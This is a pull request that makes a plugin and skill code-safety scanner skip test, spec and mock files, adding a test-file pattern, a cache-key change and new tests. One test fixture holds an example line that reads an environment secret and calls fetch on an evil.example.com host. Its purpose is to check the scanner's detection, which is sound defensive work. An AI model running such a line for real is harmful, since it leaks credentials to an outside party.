### PR TITLE
fix(security): exclude test/spec/mock files from plugin code-safety scan

### DIFF
--- a/src/security/audit-extra.async.ts
+++ b/src/security/audit-extra.async.ts
@@ -394,20 +394,24 @@ function isPinnedRegistrySpec(spec: string): boolean {
 function buildCodeSafetySummaryCacheKey(params: {
   dirPath: string;
   includeFiles?: string[];
+  excludeTestFiles?: boolean;
 }): string {
   const includeFiles = (params.includeFiles ?? []).map((entry) => entry.trim()).filter(Boolean);
   const includeKey = includeFiles.length > 0 ? includeFiles.toSorted().join("\u0000") : "";
-  return `${params.dirPath}\u0000${includeKey}`;
+  const excludeTestKey = params.excludeTestFiles ? "1" : "0";
+  return `${params.dirPath}\u0000${includeKey}\u0000excl-test:${excludeTestKey}`;
 }
 
 async function getCodeSafetySummary(params: {
   dirPath: string;
   includeFiles?: string[];
+  excludeTestFiles?: boolean;
   summaryCache?: CodeSafetySummaryCache;
 }): Promise<Awaited<ReturnType<typeof skillScanner.scanDirectoryWithSummary>>> {
   const cacheKey = buildCodeSafetySummaryCacheKey({
     dirPath: params.dirPath,
     includeFiles: params.includeFiles,
+    excludeTestFiles: params.excludeTestFiles,
   });
   const cache = params.summaryCache;
   if (cache) {
@@ -417,12 +421,14 @@ async function getCodeSafetySummary(params: {
     }
     const pending = skillScanner.scanDirectoryWithSummary(params.dirPath, {
       includeFiles: params.includeFiles,
+      excludeTestFiles: params.excludeTestFiles,
     });
     cache.set(cacheKey, pending);
     return await pending;
   }
   return await skillScanner.scanDirectoryWithSummary(params.dirPath, {
     includeFiles: params.includeFiles,
+    excludeTestFiles: params.excludeTestFiles,
   });
 }
 
@@ -1383,6 +1389,7 @@ export async function collectPluginsCodeSafetyFindings(params: {
     const summary = await getCodeSafetySummary({
       dirPath: pluginPath,
       includeFiles: forcedScanEntries,
+      excludeTestFiles: true,
       summaryCache: params.summaryCache,
     }).catch((err) => {
       findings.push({
@@ -1459,6 +1466,7 @@ export async function collectInstalledSkillsCodeSafetyFindings(params: {
       const skillName = entry.skill.name;
       const summary = await getCodeSafetySummary({
         dirPath: skillDir,
+        excludeTestFiles: true,
         summaryCache: params.summaryCache,
       }).catch((err) => {
         findings.push({

--- a/src/security/skill-scanner.test.ts
+++ b/src/security/skill-scanner.test.ts
@@ -6,6 +6,7 @@ import { afterEach, describe, expect, it, vi } from "vitest";
 import {
   clearSkillScanCacheForTest,
   isScannable,
+  isTestFile,
   scanDirectory,
   scanDirectoryWithSummary,
   scanSource,
@@ -226,6 +227,23 @@ describe("isScannable", () => {
     ["style.css", false],
   ] as const)("classifies %s", (fileName, expected) => {
     expect(isScannable(fileName)).toBe(expected);
+  });
+});
+
+describe("isTestFile", () => {
+  it.each([
+    ["provider.proxy.test.ts", true],
+    ["thread-bindings.lifecycle.test.ts", true],
+    ["component.spec.tsx", true],
+    ["helper.mock.ts", true],
+    ["index.test.js", true],
+    ["util.spec.mjs", true],
+    ["index.ts", false],
+    ["proxy-server.ts", false],
+    ["test-helpers.ts", false],
+    ["testing-utils.ts", false],
+  ] as const)("classifies %s as test=%s", (fileName, expected) => {
+    expect(isTestFile(fileName)).toBe(expected);
   });
 });
 
@@ -762,5 +780,31 @@ describe("scanDirectoryWithSummary", () => {
 
     expect(readdirSpy).toHaveBeenCalledTimes(1);
     readdirSpy.mockRestore();
+  });
+
+  it("excludes test files when excludeTestFiles is true", async () => {
+    const root = makeTmpDir();
+    // A test file with a dangerous pattern — should be ignored
+    fsSync.writeFileSync(
+      path.join(root, "provider.proxy.test.ts"),
+      `process.env.SECRET; fetch("http://evil.example.com");`,
+    );
+    // A regular source file — still gets scanned
+    fsSync.writeFileSync(path.join(root, "index.ts"), `export const ok = true;`);
+
+    const withExclusion = await scanDirectoryWithSummary(root, { excludeTestFiles: true });
+    const withoutExclusion = await scanDirectoryWithSummary(root, { excludeTestFiles: false });
+
+    // The test file's env-harvesting finding should not appear when excluded
+    const testFileFindings = withExclusion.findings.filter((f) =>
+      f.file?.includes("proxy.test.ts"),
+    );
+    expect(testFileFindings).toHaveLength(0);
+
+    // Without exclusion the same file should produce findings
+    const testFileFindingsNoExcl = withoutExclusion.findings.filter((f) =>
+      f.file?.includes("proxy.test.ts"),
+    );
+    expect(testFileFindingsNoExcl.length).toBeGreaterThan(0);
   });
 });

--- a/src/security/skill-scanner.ts
+++ b/src/security/skill-scanner.ts
@@ -30,6 +30,13 @@ export type SkillScanOptions = {
   includeFiles?: string[];
   maxFiles?: number;
   maxFileBytes?: number;
+  /**
+   * When true, files whose names match TEST_FILE_NAME_PATTERN
+   * (*.test.ts, *.spec.ts, *.mock.ts, etc.) are excluded from the scan.
+   * Use this when scanning plugin code to avoid false-positive findings
+   * on dev-time test fixtures that are never loaded at runtime.
+   */
+  excludeTestFiles?: boolean;
 };
 
 // ---------------------------------------------------------------------------
@@ -73,6 +80,17 @@ const DIR_ENTRY_CACHE = new Map<string, DirEntryCacheEntry>();
 
 export function isScannable(filePath: string): boolean {
   return SCANNABLE_EXTENSIONS.has(path.extname(filePath).toLowerCase());
+}
+
+/**
+ * Matches test, spec, and mock file names that should be excluded from
+ * production code-safety scans. These files are never loaded as the plugin
+ * runtime entry and should not produce credential-harvesting findings.
+ */
+export const TEST_FILE_NAME_PATTERN = /\.(?:mock|spec|test)\.[^.]+$/i;
+
+export function isTestFile(filePath: string): boolean {
+  return TEST_FILE_NAME_PATTERN.test(path.basename(filePath));
 }
 
 function getCachedFileScanResult(params: {
@@ -318,10 +336,15 @@ function normalizeScanOptions(opts?: SkillScanOptions): Required<SkillScanOption
     includeFiles: opts?.includeFiles ?? [],
     maxFiles: Math.max(1, opts?.maxFiles ?? DEFAULT_MAX_SCAN_FILES),
     maxFileBytes: Math.max(1, opts?.maxFileBytes ?? DEFAULT_MAX_FILE_BYTES),
+    excludeTestFiles: opts?.excludeTestFiles ?? false,
   };
 }
 
-async function walkDirWithLimit(dirPath: string, maxFiles: number): Promise<string[]> {
+async function walkDirWithLimit(
+  dirPath: string,
+  maxFiles: number,
+  excludeTestFiles = false,
+): Promise<string[]> {
   const files: string[] = [];
   const stack: string[] = [dirPath];
 
@@ -345,6 +368,9 @@ async function walkDirWithLimit(dirPath: string, maxFiles: number): Promise<stri
       if (entry.kind === "dir") {
         stack.push(fullPath);
       } else if (entry.kind === "file" && isScannable(entry.name)) {
+        if (excludeTestFiles && isTestFile(entry.name)) {
+          continue;
+        }
         files.push(fullPath);
       }
     }
@@ -440,7 +466,7 @@ async function collectScannableFiles(dirPath: string, opts: Required<SkillScanOp
     return forcedFiles.slice(0, opts.maxFiles);
   }
 
-  const walkedFiles = await walkDirWithLimit(dirPath, opts.maxFiles);
+  const walkedFiles = await walkDirWithLimit(dirPath, opts.maxFiles, opts.excludeTestFiles);
   const seen = new Set(forcedFiles.map((f) => path.resolve(f)));
   const out = [...forcedFiles];
   for (const walkedFile of walkedFiles) {


### PR DESCRIPTION
## Problem

`plugins.code_safety` raises **critical** `env-harvesting` findings on bundled plugin test files (`*.test.ts`, `*.spec.ts`, `*.mock.ts`). These files are never loaded as the plugin runtime entry — only the manifest `entry` is loaded — so they should not produce credential-harvesting findings.

Two patterns that trigger false positives:

1. **Vitest fixture restoring env vars** — `process.env.SOME_VAR` in a fixture combined with a mock `rest.post()` call hundreds of lines away satisfies the env-harvesting heuristic.
2. **String literal false match** — `it("... metadata fetch (regression for #52372)", ...` — the word `fetch (` inside an `it()` description satisfies `\bfetch\s*\(`.

Result: operators relaying `openclaw security audit --deep --json` as CRITICAL alerts see false positives for stock bundled channel plugins, eroding trust in real critical findings.

Fixes #82469

## Changes

**`src/security/skill-scanner.ts`**
- Add `TEST_FILE_NAME_PATTERN = /\.(?:mock|spec|test)\.[^.]+$/i` constant
- Add `isTestFile(filePath)` helper (exported for tests)
- Add `excludeTestFiles?: boolean` to `SkillScanOptions` (default: `false` — no behaviour change for existing callers)
- Thread `excludeTestFiles` through `normalizeScanOptions` → `walkDirWithLimit`

**`src/security/audit-extra.async.ts`**
- Include `excludeTestFiles` in `buildCodeSafetySummaryCacheKey` to prevent cache cross-contamination
- Add `excludeTestFiles` param to `getCodeSafetySummary`
- Pass `excludeTestFiles: true` in both the plugin and skill `getCodeSafetySummary` calls (neither plugins nor user skills load their test files at runtime)

**`src/security/skill-scanner.test.ts`**
- Add `isTestFile` describe block (10 cases: .test.ts, .spec.tsx, .mock.ts recognised; test-helpers.ts, testing-utils.ts, index.ts not recognised)
- Add `excludeTestFiles` integration test: verifies findings suppressed with flag, present without it

## Test results

```
✓ src/security/skill-scanner.test.ts (66 tests) 35ms
```

All 55 pre-existing tests pass; 11 new tests added.